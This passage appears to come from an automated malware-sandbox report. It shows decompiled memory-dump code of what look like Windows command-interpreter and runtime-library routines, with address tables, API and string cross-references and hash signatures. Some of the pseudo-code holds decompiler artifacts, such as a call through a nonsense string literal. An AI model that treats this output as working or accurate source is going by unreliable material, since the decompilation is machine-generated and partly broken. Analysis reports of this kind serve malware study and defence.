				if(_t107 != 0) {
					L17:
					if(_t107 == 0x103) {
						_t107 = 0;
					}
					goto L41;
				} else {
					_t121 = L"\\Shell\\Open\\Command";
					do {
						if(_v528 == 0x2e) {
							L15:
							if( *0x4a7541b4 != 0) {
								goto L19;
							}
							goto L16;
						}
						_t88 =  &_v528;
						_t9 = _t88 + 2; // 0x30
						_t120 = _t9;
						do {
							_t114 =  *_t88;
							_t88 = _t88 + 2;
						} while (_t114 != 0);
						_t107 = _t88 - _t120 >> 1;
						_t92 = _t121;
						_t115 =  &(_t92[2]);
						do {
							_t118 =  *_t92;
							_t92 =  &(_t92[2]);
						} while (_t118 != 0);
						_t95 = _t92 - _t115 >> 1;
						_t137 = _t95 + _t107 + 1 - _t122;
						if(_t95 + _t107 + 1 > _t122) {
							goto L15;
						}
						E4A7320A9(_t122,  &_v528, _t122, _t121);
						_push( &_v528);
						_push(_v536);
						_t100 = E4A74D003(_t107, _t121, _t122, _t137);
						_v540 = _t100;
						 *((short*)(_t125 + _t107 * 2 - 0x20c)) = 0;
						if(_t100 == 0) {
							L14:
							E4A73142E(_v540);
							goto L15;
						}
						_t20 = _t100 + 2; // 0x2
						_t118 = _t20;
						do {
							_t117 =  *_t100;
							_t100 = _t100 + 2;
						} while (_t117 != 0);
						if(_t100 != _t118) {
							_push(_v540);
							E4A7358F3(L"%s=%s\r\n",  &_v528);
							_t126 = _t126 + 0xc;
						}
						goto L14;
						L16:
						_v532 = _v532 + 1;
						_push(_t122);
						_t87 =  &_v528;
						_push(_t87);
						_push(_v532);
						_push(_v536);
						"J$uJT$uJ^$uJh$uJr$uJ|$uJ"();
						_t107 = _t87;
					} while (_t107 == 0);
					goto L17;
				}
			}

0x4a74d896
0x4a74d89d
0x4a74d8a0
0x4a74d8a3
0x4a74d8a9
0x4a74d8ab
0x4a74d8b3
0x4a74d9df
0x4a74d9e3
0x4a74da0a
0x4a74da0c
0x4a74da12
0x4a74da14
0x4a74d9d7
0x4a74d9d9
0x4a74db48
0x4a74db56
0x4a74db56
0x4a74da19
0x4a74da1e
0x4a74da20
0x4a74da22
0x4a74da24
0x4a74da24
0x4a74da27
0x4a74da29
0x4a74da29
0x4a74da2c
0x4a74da2c
0x4a74da30
0x4a74da31
0x4a74da31
0x4a74da36
0x4a74da36
0x4a74da3a
0x4a74da3f
0x4a74da41
0x4a74da43
0x4a74da46
0x4a74da46
0x4a74da4a
0x4a74da4b
0x4a74da4b
0x4a74da52
0x4a74da5d
0x4a74da5e
0x4a74da60
0x4a74da81
0x4a74da88
0x4a74da89
0x4a74da97
0x4a74dabd
0x4a74dabf
0x4a74dac1
0x4a74dae8
0x4a74dae9
0x4a74daef
0x4a74daf4
0x4a74daf6
0x4a74daf8
0x4a74db20
0x4a74db2d
0x4a74db32
0x4a74db36
0x4a74db41
0x4a74db46
0x4a74db46
0x00000000
0x4a74db46
0x4a74dafa
0x4a74dafa
0x4a74dafd
0x4a74dafd
0x4a74db01
0x4a74db02
0x4a74db02
0x4a74db07
0x4a74db07
0x4a74db0b
0x00000000
0x00000000
0x4a74db0d
0x4a74db19
0x00000000
0x4a74db19
0x4a74dad0
0x4a74dad5
0x4a74dad7
0x4a74da74
0x4a74da75
0x4a74da7a
0x00000000
0x4a74da7a
0x4a74da62
0x4a74da64
0x4a74da69
0x4a74da73
0x00000000
0x4a74da73
0x4a74d9ed
0x4a74d9f7
0x00000000
0x4a74d9f7
0x4a74d8b9
0x4a74d8be
0x4a74d8bf
0x4a74d8c5
0x4a74d8c6
0x4a74d8c7
0x4a74d8c8
0x4a74d8ce
0x4a74d8d4
0x4a74d8d8
0x4a74d9c4
0x4a74d9ca
0x4a74d9d0
0x4a74d9d0
0x00000000
0x4a74d8de
0x4a74d8de
0x4a74d8e3
0x4a74d8eb
0x4a74d991
0x4a74d998
0x00000000
0x00000000
0x00000000
0x4a74d998
0x4a74d8f1
0x4a74d8f7
0x4a74d8f7
0x4a74d8fa
0x4a74d8fa
0x4a74d8fe
0x4a74d8ff
0x4a74d908
0x4a74d90a
0x4a74d90c
0x4a74d90f
0x4a74d90f
0x4a74d913
0x4a74d914
0x4a74d91b
0x4a74d921
0x4a74d923
0x00000000
0x00000000
0x4a74d92e
0x4a74d939
0x4a74d93a
0x4a74d940
0x4a74d947
0x4a74d94d
0x4a74d957
0x4a74d986
0x4a74d98c
0x00000000
0x4a74d98c
0x4a74d959
0x4a74d959
0x4a74d95c
0x4a74d95c
0x4a74d960
0x4a74d961
0x4a74d96a
0x4a74d96c
0x4a74d97e
0x4a74d983
0x4a74d983
0x00000000
0x4a74d99a
0x4a74d99a
0x4a74d9a0
0x4a74d9a1
0x4a74d9a7
0x4a74d9a8
0x4a74d9ae
0x4a74d9b4
0x4a74d9ba
0x4a74d9bc
0x00000000
0x4a74d8e3

APIs

RegOpenKeyExW.KERNEL32 ref: 4A74DAB7

Strings

%s=%s, xrefs: 4A74D979, 4A74DB14
., xrefs: 4A74D8E3
\Shell\Open\Command, xrefs: 4A74D8DE, 4A74D925, 4A74DA3A, 4A74DA8E

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Open
String ID: %s=%s$.$\Shell\Open\Command
API String ID: 71445658-1459555574
Opcode ID: 20cb15f3a10fd80cd166e46790e344b8607dffc062a4d76405f154b81c22a42f
Instruction ID: 55cf5494cafdb07bc506aa8572413b749c877e1dbda4943ddc5468e6e73a02c9
Opcode Fuzzy Hash: 20cb15f3a10fd80cd166e46790e344b8607dffc062a4d76405f154b81c22a42f
Instruction Fuzzy Hash: 4871FB75A4921ABADF719B54CC8CEDA7B79EB44300F0581A4E589EB153E6708E8CCB50

Uniqueness

Uniqueness Score: -1.00%

Function 4A731EC6, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E4A731EC6(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebp;
				int _t36;
				void _t37;
				signed int _t40;
				signed int _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;
				void* _t52;
				void* _t61;
				void* _t63;
				void* _t65;
				signed int _t66;
				signed int _t70;
				void* _t71;
				signed int _t73;
				void* _t74;
				void* _t76;
				signed int _t77;
				signed int _t85;
				void* _t89;
				signed int _t90;
				void _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				void* _t101;
				signed int _t103;
				signed short* _t105;

				_t74 = __ecx;
				_push(__esi);
				_t36 = E4A731896(0x4002);
				_t103 = _t36;
				_v16 = _t103;
				if(_t103 == 0) {
					_t37 = memset(0x4a76c640, _t36, 0x4006);
					 *0x4a754194 = 0x4a76c642;
					L35:
					_push(0xffffffff);
					_push(0x4a754ac0);
					L36:
					__imp__longjmp();
					L37:
					_push(_t37);
					 *0x4a76c642 = _t37;
					E4A736D44(_t74);
					_t74 = 0x233f;
					L40:
					_t37 = E4A73142E(_v16);
					goto L35;
				}
				E4A73185A(_t103, 0x2001,  *0x4a754194);
				_t40 =  *_t103 & 0x0000ffff;
				_v12 = _v12 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				if(_t40 != 0) {
					_push(__ebx);
					_push(__edi);
					while(1) {
						_t89 = 2;
						_t105 = _t103 + _t89;
						if(_v8 > 0x2001) {
							break;
						}
						_t97 = 0x25;
						if(_t40 == _t97) {
							_t70 =  *0x4a7540b4; // 0x0
							__eflags = _t70;
							if(__eflags == 0) {
								_t71 = 0x4a754ac0;
								goto L15;
							} else {
								_t51 =  *_t105 & 0x0000ffff;
								__eflags = _t51 - _t97;
								if(_t51 == _t97) {
									_t52 =  *0x4a754194; // 0x0
									 *_t52 = _t97;
									 *0x4a754194 =  *0x4a754194 + _t89;
									_t103 = _t105 + _t89;
									__eflags = _t103;
									goto L31;
								} else {
									__eflags =  *0x4a754081;
									if( *0x4a754081 == 0) {
										L14:
										_t71 = 0x4a754ac0;
										_t43 = E4A735129(0x4a754ac0, _t105,  &_v12, L"0123456789", _t70 + 0x3c);
										__eflags = _t43;
										if(__eflags != 0) {
											L16:
											_t77 = _t43;
											_t13 = _t77 + 2; // 0x2
											_t98 = _t13;
											do {
												_t90 =  *_t77;
												_t77 = _t77 + 2;
												__eflags = _t90;
											} while (_t90 != 0);
											_t80 = _t77 - _t98 >> 1;
											_t99 = _t77 - _t98 >> 1;
											_v8 = _v8 + _t99;
											__eflags = _v8 - 0x2001;
											if(_v8 > 0x2001) {
												_push(0);
												E4A736D44(_t80);
												_t74 = 0x233f;
												_t37 = E4A73142E(_v16);
												_push(0xffffffff);
												_push(_t71);
												goto L36;
											}
											_t47 =  *0x4a754194; // 0x0
											__eflags = 0x2003;
											E4A73185A(_t47, 0x2003 - (_t47 - 0x4a76c640 >> 1), _t43);
											_t49 =  *0x4a754194; // 0x0
											 *0x4a754194 = _t49 + _t99 * 2;
											goto L20;
										} else {
											L15:
											_t43 = E4A735291(_t71, _t97, _t105, __eflags, _t71, _t105,  &_v12, _t97);
											__eflags = _t43;
											if(_t43 == 0) {
												__eflags =  *0x4a7540b4;
												if( *0x4a7540b4 != 0) {
													L20:
													_t103 =  &(_t105[_v12]);
												} else {
													_t45 =  *0x4a754194; // 0x0
													 *_t45 = _t97;
													 *0x4a754194 =  *0x4a754194 + 2;
													L31:
													_v8 = _v8 + 1;
												}
												goto L6;
											} else {
												goto L16;
											}
										}
									} else {
										__eflags = _t51 - 0x2a;
										if(_t51 == 0x2a) {
											_t103 = _t105 + _t89;
											__eflags =  *(_t70 + 0x34);
											if( *(_t70 + 0x34) == 0) {
												_t100 = 0;
											} else {
												_t65 =  *(_t70 + 0x34);
												_t101 = _t65 + 2;
												do {
													_t85 =  *_t65;
													_t65 = _t65 + _t89;
													__eflags = _t85;
												} while (_t85 != 0);
												_t66 = _t65 - _t101;
												__eflags = _t66;
												_t100 = _t66 >> 1;
											}
											_t74 =  *(_t70 + 0x34);
											__eflags = _t100;
											if(_t100 > 0) {
												_t73 = _t100 + _v8;
												__eflags = _t73 - 0x2000;
												if(_t73 > 0x2000) {
													memcpy( *0x4a754194, _t74, 0x2000 - _v8 + 0x2000 - _v8);
													__eflags = 0;
													 *0x4a770642 = 0;
													E4A736D44(_t74, 0x234f, 1, 0x4a76c642);
													goto L40;
												}
												_t61 =  *0x4a754194; // 0x0
												E4A73185A(_t61, 0x2003 - (_t61 - 0x4a76c640 >> 1), _t74);
												_t63 =  *0x4a754194; // 0x0
												_v8 = _t73;
												 *0x4a754194 = _t63 + _t100 * 2;
											}
											goto L6;
										} else {
											goto L14;
										}
									}
								}
							}
							L42:
						} else {
							_t76 =  *0x4a754194; // 0x0
							 *_t76 = _t40;
							 *0x4a754194 =  *0x4a754194 + _t89;
							_v8 = _v8 + 1;
							if(_t40 != 0xa) {
								L6:
								_t40 =  *_t103 & 0x0000ffff;
								if(_t40 != 0) {
									continue;
								}
							}
						}
						break;
					}
				}
				_t74 =  *0x4a754194; // 0x0
				_t37 = 0;
				 *_t74 = 0;
				 *0x4a754194 = 0x4a76c642;
				if(_v8 > 0x2001) {
					goto L37;
				}
				return E4A73142E(_v16);
				goto L42;
			}

0x4a731ec6
0x4a731ece
0x4a731ed4
0x4a731ed9
0x4a731edb
0x4a731ee0
0x4a746efd
0x4a746f05
0x4a746f0f
0x4a746f0f
0x4a746f11
0x4a746f16
0x4a746f16
0x4a746f1c
0x4a746f1c
0x4a746f22
0x4a746f28
0x4a746f2e
0x4a746f73
0x4a746f76
0x00000000
0x4a746f76
0x4a731ef2
0x4a731ef7
0x4a731efa
0x4a731efe
0x4a731f05
0x4a731f07
0x4a731f08
0x4a731f09
0x4a731f0b
0x4a731f0c
0x4a731f15
0x00000000
0x00000000
0x4a731f19
0x4a731f1d
0x4a734e7f
0x4a734e85
0x4a734e87
0x4a73fd7e
0x00000000
0x4a734e8d
0x4a734e8d
0x4a734e90
0x4a734e93
0x4a73e043
0x4a73e048
0x4a73e04b
0x4a73e051
0x4a73e051
0x00000000
0x4a734e99
0x4a734e99
0x4a734ea0
0x4a734eac
0x4a734eba
0x4a734ec0
0x4a734ec5
0x4a734ec7
0x4a734edd
0x4a734edd
0x4a734edf
0x4a734edf
0x4a7351cd
0x4a7351cd
0x4a7351d1
0x4a7351d2
0x4a7351d2
0x4a7351d9
0x4a7351db
0x4a7351dd
0x4a7351e0
0x4a7351e7
0x4a746f7d
0x4a746f84
0x4a746f8a
0x4a746f8e
0x4a746f93
0x4a746f95
0x00000000
0x4a746f95
0x4a7351ee
0x4a735202
0x4a735206
0x4a73520b
0x4a735213
0x00000000
0x4a734ec9
0x4a734ec9
0x4a734ed0
0x4a734ed5
0x4a734ed7
0x4a73635d
0x4a736364
0x4a735218
0x4a73521b
0x4a73636a
0x4a746f31
0x4a746f36
0x4a746f39
0x4a73e053
0x4a73e053
0x4a73e053
0x00000000
0x00000000
0x00000000
0x00000000
0x4a734ed7
0x4a734ea2
0x4a734ea2
0x4a734ea6
0x4a736022
0x4a736024
0x4a736028
0x4a73fd77
0x4a73602e
0x4a73602e
0x4a736031
0x4a736034
0x4a736034
0x4a736037
0x4a736039
0x4a736039
0x4a73603e
0x4a73603e
0x4a736042
0x4a736042
0x4a736044
0x4a736047
0x4a736049
0x4a736052
0x4a73605a
0x4a73605c
0x4a746f52
0x4a746f5c
0x4a746f65
0x4a746f6b
0x00000000
0x4a746f70
0x4a736062
0x4a73607b
0x4a736080
0x4a736088
0x4a73608b
0x4a73608b
0x00000000
0x00000000
0x00000000
0x00000000
0x4a734ea6
0x4a734ea0
0x4a734e93
0x00000000
0x4a731f23
0x4a731f23
0x4a731f29
0x4a731f2c
0x4a731f32
0x4a731f39
0x4a731f3b
0x4a731f3b
0x4a731f41
0x00000000
0x00000000
0x4a731f41
0x4a731f39
0x00000000
0x4a731f1d
0x4a731f44
0x4a731f45
0x4a731f4b
0x4a731f54
0x4a731f57
0x4a731f62
0x00000000
0x00000000
0x4a731f71
0x00000000

APIs

Part of subcall function 4A731896: GetProcessHeap.KERNEL32(00000008,4A7325C0,4A7325BB,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?), ref: 4A7318A9
Part of subcall function 4A731896: HeapAlloc.KERNEL32(00000000,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6), ref: 4A7318B0

memset.MSVCRT ref: 4A746EFD
longjmp.MSVCRT(4A754AC0,000000FF,?,00004002,4A754210), ref: 4A746F16

Strings

0123456789, xrefs: 4A734EB0

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcesslongjmpmemset
String ID: 0123456789
API String ID: 2035609091-2793719750
Opcode ID: 2391fe1d410b86184be802d694d156403c05776f69e40e0fece07119e1398f6c
Instruction ID: 37aa5e4565e1f508c8122239e6186561059ea979916cf3e4bdfc77ab1b512688
Opcode Fuzzy Hash: 2391fe1d410b86184be802d694d156403c05776f69e40e0fece07119e1398f6c
Instruction Fuzzy Hash: BC615BB1A8D612EFEB708F64CD46AAA3BBAEB41350F134054EA04DB982D7305E49C714

Uniqueness

Uniqueness Score: -1.00%

Function 4A734C09, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E4A734C09(void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t36;
				signed int _t42;
				void* _t46;
				int _t49;
				intOrPtr _t53;
				intOrPtr _t54;
				void* _t55;
				intOrPtr _t58;
				signed int _t66;
				intOrPtr* _t67;
				short* _t69;
				void* _t71;
				intOrPtr _t72;
				intOrPtr* _t74;
				signed int _t75;
				void* _t76;
				void* _t77;
				intOrPtr _t78;
				void* _t94;

				_t74 = _a4;
				_v12 = 1;
				_v8 = 0;
				_v16 = 0;
				_t77 =  *0x4a7540b4 - _t74; // 0x0
				if(_t77 != 0) {
					L23:
					return _v8;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					E4A734B2A(_t36);
					 *0x4a7540b8 = 0;
					_t78 =  *0x4a754081; // 0x0
					if(_t78 == 0 || _v12 == 0) {
						goto L3;
					}
					_t72 = _a8;
					__eflags =  *((short*)( *((intOrPtr*)(_t72 + 0x38)))) - 0x3a;
					if( *((short*)( *((intOrPtr*)(_t72 + 0x38)))) != 0x3a) {
						goto L3;
					}
					_t75 = E4A732A34();
					__eflags = _t75;
					if(_t75 == 0) {
						L42:
						return 1;
					}
					 *_t75 = 0;
					_t66 = E4A7319D6(L"GOTO");
					 *((intOrPtr*)(_t75 + 0x38)) = _t66;
					__eflags = _t66;
					if(_t66 == 0) {
						goto L42;
					}
					_t67 = E4A7319D6( *((intOrPtr*)(_t72 + 0x38)));
					 *((intOrPtr*)(_t75 + 0x3c)) = _t67;
					__eflags = _t67;
					if (_t67 == 0) goto L42;
					_pop(_t76);
					 *_t67 =  *_t67 + _t67;
					__eflags =  *_t67;
					L3:
					_t72 = E4A734D4E(_t74);
					_t80 = _t72 - 0xffffffff;
					if(_t72 == 0xffffffff) {
						goto L42;
					}
					_t42 = E4A731BD2(_t80, 3, _t72,  *((intOrPtr*)(_t74 + 0x10)));
					_t75 = _t42;
					__imp___tell(_t72);
					_t69 = _a4;
					 *((intOrPtr*)(_t69 + 8)) = _t42;
					E4A733AB3(_t72);
					if(_t75 == 0) {
						L18:
						_t36 = _a4;
						_t94 =  *0x4a7540b4 - _t36; // 0x0
						if(_t94 != 0) {
							goto L23;
						}
						_t74 = _t36;
						continue;
					}
					if(_t75 == 1 ||  *0x4a754174 == 0x234a) {
						E4A74EE72();
						__eflags =  *0x4a75408c - 1;
						if( *0x4a75408c == 1) {
							__eflags =  *0x4a7706ac; // 0x0
							if(__eflags == 0) {
								E4A73C60C(0, _t71, _t72, _t75, __eflags);
								E4A7399E1(_t69, 0x2371, 1, 0x4a76c642);
								_t76 = _t76 + 0xc;
							}
						}
						E4A74FCA6(0, _t69, _t71, _t72, _t75);
					}
					if(_t75 == 0xffffffff) {
						goto L23;
					} else {
						if(_v12 != 0) {
							__eflags = _t75;
							if(_t75 != 0) {
								_v12 = 0;
							}
						}
						_t46 =  *_t75;
						if(_t46 != 0) {
							L11:
							if(_v16 != 0) {
								_v16 = 0;
								L13:
								if( *_t75 == 0x3b) {
									L20:
									_t75 =  *((intOrPtr*)(_t75 + 0x38));
								}
								if(_t75 == 0) {
									L38:
									_v8 = 0;
									goto L18;
								}
								if( *_t75 != 0 || E4A7340F2(0x2a,  *((intOrPtr*)(_t75 + 0x38)), 0x4a768640) != 0xffffffff) {
									L17:
									_v8 = E4A731492(2, _t75);
									E4A731605();
									_t49 = GetConsoleOutputCP();
									 *0x4a7541b8 = _t49;
									GetCPInfo(_t49, 0x4a754260);
									_push(0);
									E4A731690();
									goto L18;
								} else {
									_t53 = E4A7318EB( *((intOrPtr*)(_t75 + 0x38)), 0x2a);
									__eflags = _t53;
									if(_t53 != 0) {
										goto L17;
									}
									_t54 = E4A7318EB( *((intOrPtr*)(_t75 + 0x38)), 0x3f);
									__eflags = _t54;
									if(_t54 != 0) {
										goto L17;
									}
									_t55 = E4A733370(0, _t75, 0x4a768640, 0x2000);
									__eflags = _t55 - 2;
									if(_t55 != 2) {
										goto L17;
									}
									__eflags =  *((intOrPtr*)(_t75 + 0x34));
									if(__eflags != 0) {
										__eflags = E4A74E8B8(_a8, _t75);
										if(__eflags == 0) {
											goto L36;
										}
										goto L42;
									}
									L36:
									_t58 = E4A735C8C(0, 0x4a768640, _t75, __eflags, _t75,  *_a4,  *((intOrPtr*)(_a4 + 4)));
									__eflags = _t58;
									if(_t58 != 0) {
										goto L42;
									}
									_v12 = 1;
									goto L38;
								}
							}
							if( *0x4a75408c == 1) {
								__eflags = _t46 - 0x3b;
								if(_t46 == 0x3b) {
									goto L20;
								}
								__eflags =  *0x4a7706ac; // 0x0
								if(__eflags == 0) {
									E4A73C60C(0, _t71, _t72, _t75, __eflags);
									E4A73CB29(_t75, 0);
									E4A7358F3();
									_t69 = 0x4a7545a8;
								}
							}
							goto L13;
						} else {
							_t69 =  *((intOrPtr*)(_t75 + 0x38));
							if( *_t69 == 0x3a) {
								goto L18;
							}
							goto L11;
						}
					}
				}
			}

0x4a734c13
0x4a734c19
0x4a734c20
0x4a734c23
0x4a734c26
0x4a734c2c
0x4a735816
0x00000000
0x00000000
0x00000000
0x00000000
0x4a734c32
0x4a734c32
0x4a734c32
0x4a734c37
0x4a734c3d
0x4a734c43
0x00000000
0x00000000
0x4a735fc4
0x4a735fca
0x4a735fce
0x00000000
0x00000000
0x4a735fd9
0x4a735fdb
0x4a735fdd
0x4a73bc79
0x00000000
0x4a73bc7b
0x4a735fe8
0x4a735fea
0x4a735fef
0x4a735ff2
0x4a735ff4
0x00000000
0x00000000
0x4a735ffd
0x4a736002
0x4a736005
0x4a736007
0x4a73600a
0x4a73600b
0x4a73600b
0x4a734c4e
0x4a734c54
0x4a734c56
0x4a734c59
0x00000000
0x00000000
0x4a734c65
0x4a734c6b
0x4a734c6d
0x4a734c74
0x4a734c78
0x4a734c7b
0x4a734c82
0x4a734d33
0x4a734d33
0x4a734d36
0x4a734d3c
0x00000000
0x00000000
0x4a734d42
0x00000000
0x4a734d42
0x4a734c8b
0x4a7447f5
0x4a7447fa
0x4a744801
0x4a744803
0x4a744809
0x4a74480b
0x4a74481c
0x4a744821
0x4a744821
0x4a744809
0x4a744824
0x4a744824
0x4a734ca4
0x00000000
0x4a734caa
0x4a734cad
0x4a73575c
0x4a73575e
0x4a735764
0x4a735764
0x4a73575e
0x4a734cb3
0x4a734cb7
0x4a734cc2
0x4a734cc5
0x4a73d6e5
0x4a734cd8
0x4a734cdb
0x4a7355c0
0x4a7355c0
0x4a7355c0
0x4a734ce3
0x4a736dd7
0x4a736dd7
0x00000000
0x4a736dd7
0x4a734ceb
0x4a734d06
0x4a734d0e
0x4a734d11
0x4a734d16
0x4a734d22
0x4a734d27
0x4a734d2d
0x4a734d2e
0x00000000
0x4a736d78
0x4a736d7d
0x4a736d82
0x4a736d84
0x00000000
0x00000000
0x4a736d8f
0x4a736d94
0x4a736d96
0x00000000
0x00000000
0x4a736da3
0x4a736da8
0x4a736dab
0x00000000
0x00000000
0x4a736db1
0x4a736db4
0x4a744837
0x4a744839
0x00000000
0x00000000
0x00000000
0x4a74483f
0x4a736dba
0x4a736dc3
0x4a736dc8
0x4a736dca
0x00000000
0x00000000
0x4a736dd0
0x00000000
0x4a736dd0
0x4a734ceb
0x4a734cd2
0x4a73bc48
0x4a73bc4b
0x00000000
0x00000000
0x4a73bc51
0x4a73bc57
0x4a73bc5d
0x4a73bc64
0x4a73bc6e
0x4a73bc73
0x4a73bc73
0x4a73bc57
0x00000000
0x4a734cb9
0x4a734cb9
0x4a734cc0
0x00000000
0x00000000
0x00000000
0x4a734cc0
0x4a734cb7
0x4a734ca4

APIs

_tell.MSVCRT ref: 4A734C6D
GetConsoleOutputCP.KERNEL32 ref: 4A734D16
GetCPInfo.KERNEL32(00000000,4A754260,?,4A7315C5,4A754210,4A73745B,-00000003,00000000,00000000,00000000,00000000,?,00000004,?,4A754210,?), ref: 4A734D27

Strings

GOTO, xrefs: 4A735FE3

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ConsoleInfoOutput_tell
String ID: GOTO
API String ID: 3312154647-1693823284
Opcode ID: 0f4f5b7777692812dd9853371795632a6a143a4663bba80308bfaa9b8b7809d4
Instruction ID: f89d0978d106e715bc1c6a751ac721985bfb66177a741218285806f7239c5ec8
Opcode Fuzzy Hash: 0f4f5b7777692812dd9853371795632a6a143a4663bba80308bfaa9b8b7809d4
Instruction Fuzzy Hash: 375145B294DA12FFDBB06FA1C9885897FB4EF05315F134429E2419B953D770898CCB62

Uniqueness

Uniqueness Score: -1.00%

Function 023753A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E023753A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x024301c0;
									_push(_t92);
									_push(0);
									_t37 = E0234F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02394FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E023A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E023A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E023D217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E023A3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02393915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02375384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0234F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02393915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0234F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02393915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0234F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02393915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E02375329(_t74, _t92);
													_push(1);
													return E023753A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
